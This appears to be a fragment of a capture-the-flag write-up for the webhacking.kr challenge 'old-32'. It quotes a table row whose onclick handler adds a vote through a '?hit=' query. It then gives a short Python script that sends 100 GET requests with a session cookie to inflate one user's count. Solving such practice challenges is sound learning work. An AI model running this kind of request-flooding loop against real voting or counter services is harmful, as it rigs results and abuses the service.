old-32 (150)




Last updated




Last updated
<tr onmouseover="this.style.background='gray'" onmouseout=
"this.style.background='black'" onclick= "location.href='?hit=dominic20'" style=
"background: black;">
<td>852</td>
<td>dominic20</td>
<td align="center">0 / 100</td>
</tr>import requests
URL = 'https://webhacking.kr/challenge/code-5/?hit=donghyunlee00'
PHPSESSID = 'MY_PHPSESSID'
for i in range(100):
requests.get(URL, cookies={'PHPSESSID': PHPSESSID})